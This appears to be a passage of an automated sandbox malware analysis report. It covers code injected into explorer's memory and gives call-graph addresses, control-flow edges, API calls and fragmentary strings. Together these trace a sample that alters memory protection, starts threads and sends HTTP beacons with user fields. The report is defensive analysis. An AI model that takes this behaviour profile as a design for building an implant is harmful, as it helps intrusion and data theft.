10dc41b2 13737->13741 13737->13742 13738->13737 13740 10dc4117 getaddrinfo 13738->13740 13738->13742 13739->13741 13740->13737 13741->13742 13743 10dc06b2 send 13741->13743 13745 10dc4729 13743->13745 13744 10dc47f4 setsockopt recv 13744->13742 13745->13742 13745->13744 13774 10dbc0fb 13776 10dbc137 13774->13776 13775 10dbc2d5 13776->13775 13777 10db88f2 NtProtectVirtualMemory 13776->13777 13778 10dbc28a 13777->13778 13779 10db88f2 NtProtectVirtualMemory 13778->13779 13782 10dbc2a9 13779->13782 13780 10dbc2cd 13781 10dbf382 ObtainUserAgentString 13780->13781 13781->13775 13782->13780 13783 10db88f2 NtProtectVirtualMemory 13782->13783 13783->13780 13913 10dbbfbf 13915 10dbc016 13913->13915 13914 10dbc0f0 13915->13914 13918 10dbc0bb 13915->13918 13919 10db88f2 NtProtectVirtualMemory 13915->13919 13916 10dbc0e8 13917 10dbf382 ObtainUserAgentString 13916->13917 13917->13914 13918->13916 13920 10db88f2 NtProtectVirtualMemory 13918->13920 13919->13918 13920->13916 13822 10dbe8be 13824 10dbe8c3 13822->13824 13823 10dbe9a6 13824->13823 13825 10dbe995 ObtainUserAgentString 13824->13825 13825->13823 13826 10dc00b9 13827 10dc00ed 13826->13827 13829 10dc01f0 13826->13829 13828 10dc3f82 6 API calls 13827->13828 13827->13829 13828->13829 13873 10dc283a 13874 10dc2841 13873->13874 13875 10dc3f82 6 API calls 13874->13875 13876 10dc28c5 13875->13876 13877 10dc2906 13876->13877 13878 10dc3232 NtCreateFile 13876->13878 13878->13877 13958 10dc3f7a 13959 10dc3fb8 13958->13959 13960 10dc05b2 socket 13959->13960 13962 10dc4081 13959->13962 13969 10dc4022 13959->13969 13960->13962 13961 10dc4134 13963 10dc0732 connect 13961->13963 13968 10dc41b2 13961->13968 13961->13969 13962->13961 13964 10dc4117 getaddrinfo 13962->13964 13962->13969 13963->13968 13964->13961 13965 10dc06b2 send 13967 10dc4729 13965->13967 13966 10dc47f4 setsockopt recv 13966->13969 13967->13966 13967->13969 13968->13965 13968->13969 13784 10db80f1 13785 10db8109 13784->13785 13786 10db81d3 13784->13786 13787 10db8012 6 API calls 13785->13787 13788 10db8113 13787->13788 13788->13786 13789 10dc3f82 6 API calls 13788->13789 13789->13786 13897 10db95f1 13898 10db960e 13897->13898 13899 10db9606 13897->13899 13900 10dbe662 6 API calls 13899->13900 13900->13898 13901 10dc59f1 13902 10dc59f7 13901->13902 13905 10dba852 13902->13905 13904 10dc5a0f 13906 10dba865 13905->13906 13907 10dba8e4 13905->13907 13906->13907 13908 10dba87e 13906->13908 13910 10dba887 13906->13910 13907->13904 13909 10dc036f 13908->13909 13912 10dc00c2 6 API calls 13908->13912 13909->13904 13910->13907 13911 10dbe662 6 API calls 13910->13911 13911->13907 13912->13909 13730 10dc3232 13731 10dc325c 13730->13731 13733 10dc3334 13730->13733 13732 10dc3410 NtCreateFile 13731->13732 13731->13733 13732->13733 13790 10dbc2f4 13791 10dbc349 13790->13791 13792 10dbc49f 13791->13792 13794 10db88f2 NtProtectVirtualMemory 13791->13794 13793 10db88f2 NtProtectVirtualMemory 13792->13793 13797 10dbc4c3 13792->13797 13793->13797 13795 10dbc480 13794->13795 13796 10db88f2 NtProtectVirtualMemory 13795->13796 13796->13792 13798 10db88f2 NtProtectVirtualMemory 13797->13798 13799 10dbc597 13797->13799 13798->13799 13800 10db88f2 NtProtectVirtualMemory 13799->13800 13803 10dbc5bf 13799->13803 13800->13803 13801 10dbc6e1 13802 10dbf382 ObtainUserAgentString 13801->13802 13804 10dbc6e9 13802->13804 13805 10db88f2 NtProtectVirtualMemory 13803->13805 13806 10dbc6b9 13803->13806 13805->13806 13806->13801 13807 10db88f2 NtProtectVirtualMemory 13806->13807 13807->13801 13921 10dc59b3 13922 10dc59bd 13921->13922 13925 10dba6d2 13922->13925 13924 10dc59e0 13926 10dba6f7 13925->13926 13927 10dba704 13925->13927 13928 10db80f2 6 API calls 13926->13928 13929 10dba72d 13927->13929 13931 10dba6ff 13927->13931 13932 10dba737 13927->13932 13928->13931 13934 10dc02c2 13929->13934 13931->13924 13932->13931 13933 10dc3f82 6 API calls 13932->13933 13933->13931 13935 10dc02df 13934->13935 13936 10dc02cb 13934->13936 13935->13931 13936->13935 13937 10dc00c2 6 API calls 13936->13937 13937->13935 13483 10dc4bac 13484 10dc4bb1 13483->13484 13517 10dc4bb6 13484->13517 13518 10dbab72 13484->13518 13486 10dc4c2c 13487 10dc4c85 13486->13487 13489 10dc4c69 13486->13489 13490 10dc4c54 13486->13490 13486->13517 13488 10dc2ab2 NtProtectVirtualMemory 13487->13488 13491 10dc4c8d 13488->13491 13493 10dc4c6e 13489->13493 13494 10dc4c80 13489->13494 13492 10dc2ab2 NtProtectVirtualMemory 13490->13492 13554 10dbc102 13491->13554 13497 10dc4c5c 13492->13497 13498 10dc2ab2 NtProtectVirtualMemory 13493->13498 13494->13487 13495 10dc4c97 13494->13495 13499 10dc4c9c 13495->13499 13500 10dc4cbe 13495->13500 13540 10dbbee2 13497->13540 13502 10dc4c76 13498->13502 13522 10dc2ab2 13499->13522 13504 10dc4cd9 13500->13504 13505 10dc4cc7 13500->13505 13500->13517 13546 10dbbfc2 13502->13546 13509 10dc2ab2 NtProtectVirtualMemory 13504->13509 13504->13517 13506 10dc2ab2 NtProtectVirtualMemory 13505->13506 13508 10dc4ccf 13506->13508 13564 10dbc2f2 13508->13564 13512 10dc4ce5 13509->13512 13582 10dbc712 13512->13582 13520 10dbab93 13518->13520 13519 10dbacce 13519->13486 13520->13519 13521 10dbacb5 CreateMutexExW 13520->13521 13521->13519 13523 10dc2adf 13522->13523 13531 10dc2ebc 13523->13531 13594 10db88f2 13523->13594 13525 10dc2e5c 13526 10db88f2 NtProtectVirtualMemory 13525->13526 13527 10dc2e7c 13526->13527 13528 10db88f2 NtProtectVirtualMemory 13527->13528 13529 10dc2e9c 13528->13529 13530 10db88f2 NtProtectVirtualMemory 13529->13530 13530->13531 13532 10dbbde2 13531->13532 13534 10dbbdf0 13532->13534 13533 10dbbecd 13536 10db8412 13533->13536 13534->13533 13619 10dbf382 13534->13619 13538 10db8440 13536->13538 13537 10db8473 13537->13517 13538->13537 13539 10db844d CreateThread 13538->13539 13539->13517 13542 10dbbf06 13540->13542 13541 10dbbfa4 13541->13517 13542->13541 13543 10db88f2 NtProtectVirtualMemory 13542->13543 13544 10dbbf9c 13543->13544 13545 10dbf382 ObtainUserAgentString 13544->13545 13545->13541 13547 10dbc016 13546->13547 13550 10dbc0bb 13547->13550 13551 10dbc0f0 13547->13551 13552 10db88f2 NtProtectVirtualMemory 13547->13552 13548 10dbc0e8 13549 10dbf382 ObtainUserAgentString 13548->13549 13549->13551 13550->13548 13553 10db88f2 NtProtectVirtualMemory 13550->13553 13551->13517 13552->13550 13553->13548 13556 10dbc137 13554->13556 13555 10dbc2d5 13555->13517 13556->13555 13557 10db88f2 NtProtectVirtualMemory 13556->13557 13558 10dbc28a 13557->13558 13559 10db88f2 NtProtectVirtualMemory 13558->13559 13562 10dbc2a9 13559->13562 13560 10dbc2cd 13561 10dbf382 ObtainUserAgentString 13560->13561 13561->13555 13562->13560 13563 10db88f2 NtProtectVirtualMemory 13562->13563 13563->13560 13565 10dbc349 13564->13565 13566 10dbc49f 13565->13566 13568 10db88f2 NtProtectVirtualMemory 13565->13568 13567 10db88f2 NtProtectVirtualMemory 13566->13567 13571 10dbc4c3 13566->13571 13567->13571 13569 10dbc480 13568->13569 13570 10db88f2 NtProtectVirtualMemory 13569->13570 13570->13566 13572 10db88f2 NtProtectVirtualMemory 13571->13572 13573 10dbc597 13571->13573 13572->13573 13574 10db88f2 NtProtectVirtualMemory 13573->13574 13577 10dbc5bf 13573->13577 13574->13577 13575 10dbc6e1 13576 10dbf382 ObtainUserAgentString 13575->13576 13578 10dbc6e9 13576->13578 13579 10db88f2 NtProtectVirtualMemory 13577->13579 13580 10dbc6b9 13577->13580 13578->13517 13579->13580 13580->13575 13581 10db88f2 NtProtectVirtualMemory 13580->13581 13581->13575 13583 10dbc767 13582->13583 13584 10db88f2 NtProtectVirtualMemory 13583->13584 13588 10dbc903 13583->13588 13585 10dbc8e3 13584->13585 13586 10db88f2 NtProtectVirtualMemory 13585->13586 13586->13588 13587 10dbc9b7 13589 10dbf382 ObtainUserAgentString 13587->13589 13590 10db88f2 NtProtectVirtualMemory 13588->13590 13591 10dbc992 13588->13591 13592 10dbc9bf 13589->13592 13590->13591 13591->13587 13593 10db88f2 NtProtectVirtualMemory 13591->13593 13592->13517 13593->13587 13595 10db8987 13594->13595 13598 10db89b2 13595->13598 13609 10db9622 13595->13609 13597 10db8c0c 13597->13525 13598->13597 13599 10db8ba2 13598->13599 13601 10db8ac5 13598->13601 13600 10dc4e12 NtProtectVirtualMemory 13599->13600 13608 10db8b5b 13600->13608 13613 10dc4e12 13601->13613 13603 10dc4e12 NtProtectVirtualMemory 13603->13597 13604 10db8ae3 13604->13597 13605 10db8b3d 13604->13605 13606 10dc4e12 NtProtectVirtualMemory 13604->13606 13607 10dc4e12 NtProtectVirtualMemory 13605->13607 13606->13605 13607->13608 13608->13597 13608->13603 13610 10db967a 13609->13610 13611 10dc4e12 NtProtectVirtualMemory 13610->13611 13612 10db9684 13610->13612 13611->13610 13612->13598 13617 10dc3942 13613->13617 13615 10dc4e45 NtProtectVirtualMemory 13616 10dc4e70 13615->13616 13616->13604 13618 10dc3967 13617->13618 13618->13615 13620 10dbf3c7 13619->13620 13623 10dbf232 13620->13623 13622 10dbf438 13622->13533 13624 10dbf25e 13623->13624 13627 10dbe8c2 13624->13627 13626 10dbf26b 13626->13622 13628 10dbe934 13627->13628 13629 10dbe9a6 13628->13629 13630 10dbe995 ObtainUserAgentString 13628->13630 13629->13626 13630->13629 13879 10dbf22a 13880 10dbf25e 13879->13880 13881 10dbe8c2 ObtainUserAgentString 13880->13881 13882 10dbf26b 13881->13882 13974 10dc072e 13975 10dc0788 connect 13974->13975 13976 10dc076a 13974->13976 13976->13975 13830 10dc5aa9 13831 10dc5aaf 13830->13831 13834 10dc0212 13831->13834 13833 10dc5ac7 13835 10dc0237 13834->13835 13836 10dc021b 13834->13836 13835->13833 13836->13835 13837 10dc00c2 6 API calls 13836->13837 13837->13835 13883 10db942e 13884 10db945b 13883->13884 13892 10db94c9 13883->13892 13885 10dc3232 NtCreateFile 13884->13885 13884->13892 13886 10db9496 13885->13886 13887 10db94c5 13886->13887 13888 10db9082 NtCreateFile 13886->13888 13889 10dc3232 NtCreateFile 13887->13889 13887->13892 13890 10db94b6 13888->13890 13889->13892 13890->13887 13891 10db8f52 NtCreateFile 13890->13891 13891->13887 13808 10dc02e4 13809 10dc036f 13808->13809 13810 10dc0305 13808->13810 13810->13809 13812 10dc00c2 13810->13812 13813 10dc01f0 13812->13813 13814 10dc00cb 13812->13814 13813->13809 13814->13813 13815 10dc3f82 6 API calls 13814->13815 13815->13813 13816 10dbdce2 13818 10dbddd9 13816->13818 13817 10dbe022 13818->13817 13819 10dbd352 NtCreateFile 13818->13819 13820 10dbdf0d 13819->13820 13820->13817 13821 10dbd792 NtCreateFile 13820->13821 13821->13820 13970 10dbab66 13971 10dbab6a 13970->13971 13972 10dbacb5 CreateMutexExW 13971->13972 13973 10dbacce 13971->13973 13972->13973

                                                                                                                                            Executed Functions

                                                                                                                                            Function 10DC3F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 10dc3f82-10dc3fb6 1 10dc3fb8-10dc3fbc 0->1 2 10dc3fd6-10dc3fd9 0->2 1->2 3 10dc3fbe-10dc3fc2 1->3 4 10dc48fe-10dc490c 2->4 5 10dc3fdf-10dc3fed 2->5 3->2 6 10dc3fc4-10dc3fc8 3->6 7 10dc48f6-10dc48f7 5->7 8 10dc3ff3-10dc3ff7 5->8 6->2 9 10dc3fca-10dc3fce 6->9 7->4 10 10dc3fff-10dc4000 8->10 11 10dc3ff9-10dc3ffd 8->11 9->2 12 10dc3fd0-10dc3fd4 9->12 13 10dc400a-10dc4010 10->13 11->10 11->13 12->2 12->5 14 10dc403a-10dc4060 13->14 15 10dc4012-10dc4020 13->15 16 10dc4068-10dc407c call 10dc05b2 14->16 17 10dc4062-10dc4066 14->17 15->14 18 10dc4022-10dc4026 15->18 22 10dc4081-10dc40a2 16->22 17->16 19 10dc40a8-10dc40ab 17->19 18->7 21 10dc402c-10dc4035 18->21 23 10dc4144-10dc4150 19->23 24 10dc40b1-10dc40b8 19->24 21->7 22->19 25 10dc48ee-10dc48ef 22->25 23->25 26 10dc4156-10dc4165 23->26 27 10dc40ba-10dc40dc call 10dc3942 24->27 28 10dc40e2-10dc40f5 24->28 25->7 29 10dc417f-10dc418f 26->29 30 10dc4167-10dc4178 call 10dc0552 26->30 27->28 28->25 32 10dc40fb-10dc4101 28->32 34 10dc41e5-10dc421b 29->34 35 10dc4191-10dc41ad call 10dc0732 29->35 30->29 32->25 37 10dc4107-10dc4109 32->37 40 10dc422d-10dc4231 34->40 41 10dc421d-10dc422b 34->41 43 10dc41b2-10dc41da 35->43 37->25 42 10dc410f-10dc4111 37->42 45 10dc4247-10dc424b 40->45 46 10dc4233-10dc4245 40->46 44 10dc427f-10dc4280 41->44 42->25 47 10dc4117-10dc4132 getaddrinfo 42->47 43->34 49 10dc41dc-10dc41e1 43->49 48 10dc4283-10dc42e0 call 10dc4d62 call 10dc1482 call 10dc0e72 call 10dc5002 44->48 50 10dc424d-10dc425f 45->50 51 10dc4261-10dc4265 45->51 46->44 47->23 52 10dc4134-10dc413c 47->52 63 10dc42f4-10dc4354 call 10dc4d92 48->63 64 10dc42e2-10dc42e6 48->64 49->34 50->44 53 10dc426d-10dc4279 51->53 54 10dc4267-10dc426b 51->54 52->23 53->44 54->48 54->53 69 10dc448c-10dc44b8 call 10dc4d62 call 10dc5262 63->69 70 10dc435a-10dc4396 call 10dc4d62 call 10dc5262 call 10dc5002 63->70 64->63 66 10dc42e8-10dc42ef call 10dc1042 64->66 66->63 79 10dc44d9-10dc4590 call 10dc5262 * 3 call 10dc5002 * 2 call 10dc1482 69->79 80 10dc44ba-10dc44d5 69->80 85 10dc4398-10dc43b7 call 10dc5262 call 10dc5002 70->85 86 10dc43bb-10dc43e9 call 10dc5262 * 2 70->86 112 10dc4595-10dc45b9 call 10dc5262 79->112 80->79 85->86 100 10dc43eb-10dc4410 call 10dc5002 call 10dc5262 86->100 101 10dc4415-10dc441d 86->101 100->101 105 10dc441f-10dc4425 101->105 106 10dc4442-10dc4448 101->106 109 10dc4467-10dc4487 call 10dc5262 105->109 110 10dc4427-10dc443d 105->110 111 10dc444e-10dc4456 106->111 106->112 109->112 110->112 111->112 116 10dc445c-10dc445d 111->116 121 10dc45bb-10dc45cc call 10dc5262 call 10dc5002 112->121 122 10dc45d1-10dc46ad call 10dc5262 * 7 call 10dc5002 call 10dc4d62 call 10dc5002 call 10dc0e72 call 10dc1042 112->122 116->109 133 10dc46af-10dc46b3 121->133 122->133 135 10dc46ff-10dc472d call 10dc06b2 133->135 136 10dc46b5-10dc46fa call 10dc0382 call 10dc07b2 133->136 143 10dc475d-10dc4761 135->143 144 10dc472f-10dc4735 135->144 158 10dc48e6-10dc48e7 136->158 148 10dc490d-10dc4913 143->148 149 10dc4767-10dc476b 143->149 144->143 147 10dc4737-10dc474c 144->147 147->143 152 10dc474e-10dc4754 147->152 153 10dc4779-10dc4784 148->153 154 10dc4919-10dc4920 148->154 155 10dc48aa-10dc48df call 10dc07b2 149->155 156 10dc4771-10dc4773 149->156 152->143 159 10dc4756 152->159 160 10dc4786-10dc4793 153->160 161 10dc4795-10dc4796 153->161 154->160 155->158 156->153 156->155 158->25 159->143 160->161 164 10dc479c-10dc47a0 160->164 161->164 167 10dc47b1-10dc47b2 164->167 168 10dc47a2-10dc47af 164->168 170 10dc47b8-10dc47c4 167->170 168->167 168->170 173 10dc47f4-10dc4861 setsockopt recv 170->173 174 10dc47c6-10dc47ef call 10dc4d92 call 10dc4d62 170->174 176 10dc48a3-10dc48a4 173->176 177 10dc4863 173->177 174->173 176->155 177->176 181 10dc4865-10dc486a 177->181 181->176 184 10dc486c-10dc4872 181->184 184->176 186 10dc4874-10dc48a1 184->186 186->176 186->177
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                            • API String ID: 1564272048-1117930895
                                                                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                            • Instruction ID: 1663856c17f568f5ea9b0d04ff4c180689e2c8830ba723a31fa00320697e5845
                                                                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                            • Instruction Fuzzy Hash: 2252CE34618A488BC758EF68C5847EAB7E1FF94300F54462ED49FC7186DE30B98ACB95
                                                                                                                                            Function 10DC3232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 299 10dc3232-10dc3256 300 10dc325c-10dc3260 299->300 301 10dc38bd-10dc38cd 299->301 300->301 302 10dc3266-10dc32a0 300->302 303 10dc32bf 302->303 304 10dc32a2-10dc32a6 302->304 306 10dc32c6 303->306 304->303 305 10dc32a8-10dc32ac 304->305 307 10dc32ae-10dc32b2 305->307 308 10dc32b4-10dc32b8 305->308 309 10dc32cb-10dc32cf 306->309 307->306 308->309 310 10dc32ba-10dc32bd 308->310 311 10dc32f9-10dc330b 309->311 312 10dc32d1-10dc32f7 call 10dc3942 309->312 310->309 316 10dc330d-10dc3332 311->316 317 10dc3378 311->317 312->311 312->317 318 10dc3334-10dc333b 316->318 319 10dc33a1-10dc33a8 316->319 320 10dc337a-10dc33a0 317->320 321 10dc333d-10dc3360 call 10dc3942 318->321 322 10dc3366-10dc3370 318->322 323 10dc33aa-10dc33d3 call 10dc3942 319->323 324 10dc33d5-10dc33dc 319->324 321->322 322->317 328 10dc3372-10dc3373 322->328 323->317 323->324 325 10dc33de-10dc340a call 10dc3942 324->325 326 10dc3410-10dc3458 NtCreateFile call 10dc3172 324->326 325->317 325->326 335 10dc345d-10dc345f 326->335 328->317 335->317 336 10dc3465-10dc346d 335->336 336->317 337 10dc3473-10dc3476 336->337 338 10dc3478-10dc3481 337->338 339 10dc3486-10dc348d 337->339 338->320 340 10dc348f-10dc34b8 call 10dc3942 339->340 341 10dc34c2-10dc34ec 339->341 340->317 348 10dc34be-10dc34bf 340->348 346 10dc38ae-10dc38b8 341->346 347 10dc34f2-10dc34f5 341->347 346->317 349 10dc34fb-10dc34fe 347->349 350 10dc3604-10dc3611 347->350 348->341 351 10dc355e-10dc3561 349->351 352 10dc3500-10dc3507 349->352 350->320 357 10dc3616-10dc3619 351->357 358 10dc3567-10dc3572 351->358 354 10dc3538-10dc3559 352->354 355 10dc3509-10dc3532 call 10dc3942 352->355 362 10dc35e9-10dc35fa 354->362 355->317 355->354 360 10dc361f-10dc3626 357->360 361 10dc36b8-10dc36bb 357->361 363 10dc3574-10dc359d call 10dc3942 358->363 364 10dc35a3-10dc35a6 358->364 369 10dc3628-10dc3651 call 10dc3942 360->369 370 10dc3657-10dc366b call 10dc4e92 360->370 366 10dc36bd-10dc36c4 361->366 367 10dc3739-10dc373c 361->367 362->350 363->317 363->364 364->317 365 10dc35ac-10dc35b6 364->365 365->317 372 10dc35bc-10dc35e6 365->372 373 10dc36f5-10dc3734 366->373 374 10dc36c6-10dc36ef call 10dc3942 366->374 376 10dc37c4-10dc37c7 367->376 377 10dc3742-10dc3749 367->377 369->317 369->370 370->317 391 10dc3671-10dc36b3 370->391 372->362 397 10dc3894-10dc38a9 373->397 374->346 374->373 376->317 380 10dc37cd-10dc37d4 376->380 383 10dc377a-10dc37bf 377->383 384 10dc374b-10dc3774 call 10dc3942 377->384 386 10dc37fc-10dc3803 380->386 387 10dc37d6-10dc37f6 call 10dc3942 380->387 383->397 384->346 384->383 395 10dc382b-10dc3835 386->395 396 10dc3805-10dc3825 call 10dc3942 386->396 387->386 391->320 395->346 401 10dc3837-10dc383e 395->401 396->395 397->320 401->346 404 10dc3840-10dc3886 401->404 404->397
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: `
                                                                                                                                            • API String ID: 823142352-2679148245
                                                                                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                            • Instruction ID: 8d6a0beff2f7e7c98947625b378c2a6e77b8a307f7b55a92c7da136a600a0d56
                                                                                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                            • Instruction Fuzzy Hash: 94226B70A18A499FCB89DF28C5957AAF7E1FB98300F51422EE45ED7250DF30E951CB82
                                                                                                                                            Function 10DC4E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 443 10dc4e12-10dc4e6e call 10dc3942 NtProtectVirtualMemory 446 10dc4e7d-10dc4e8f 443->446 447 10dc4e70-10dc4e7c 443->447
                                                                                                                                            APIs
                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 10DC4E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                            • Instruction ID: 3624a030a701b64e6e7f305cc3b1c7339486e0cefe8236bea7cbdf1fc50d3bbf
                                                                                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                            • Instruction Fuzzy Hash: C601B134628B884F8788EF6CD48122AB7E4FBCD314F000B3EE99AC3250EB70C5414B42
                                                                                                                                            Function 10DC4E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 448 10dc4e0a-10dc4e38 449 10dc4e45-10dc4e6e NtProtectVirtualMemory 448->449 450 10dc4e40 call 10dc3942 448->450 451 10dc4e7d-10dc4e8f 449->451 452 10dc4e70-10dc4e7c 449->452 450->449
                                                                                                                                            APIs
                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 10DC4E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                            • Instruction ID: a1a90e6c7432a7d49f0808b86e1617b57e1d50ffd05778badece566fabc0c2f8
                                                                                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                            • Instruction Fuzzy Hash: D401A234628B884B8748EB2C94412A6B3E5FBCE314F004B3EE9DAC3240DB71D5024B82
                                                                                                                                            Function 10DBE8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • ObtainUserAgentString.URLMON ref: 10DBE9A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction ID: 5d8baab80a8c0bb1839adc16f04cb62d9f0d260b7f380cc85067051aca0c09bf
                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction Fuzzy Hash: 6C31B131614A4D8BCB44EFA8C8857EDB7E1FB98314F40422EE45ED7280DE749645CB99
                                                                                                                                            Function 10DBE8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • ObtainUserAgentString.URLMON ref: 10DBE9A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction ID: 12c1d87df9f28b627b2e439860d402ddcf696a0e0e36193b0719139d837b8e42
                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction Fuzzy Hash: EA21C130614A4D8BCB44EFA8C8857EDBBA1FF58304F40422EE45AD7280EE7496458B99
                                                                                                                                            Function 10DBAB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                            • Instruction ID: f91b5bccbc548fd9f86220b2d1f03bdad56d82cbaee0704aeee5f20da9cddf14
                                                                                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                            • Instruction Fuzzy Hash: CE418B74918A088FCB84EFA8C8997AD77E0FB58301F44417AD84ADB259DE309945CB96
                                                                                                                                            Function 10DBAB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
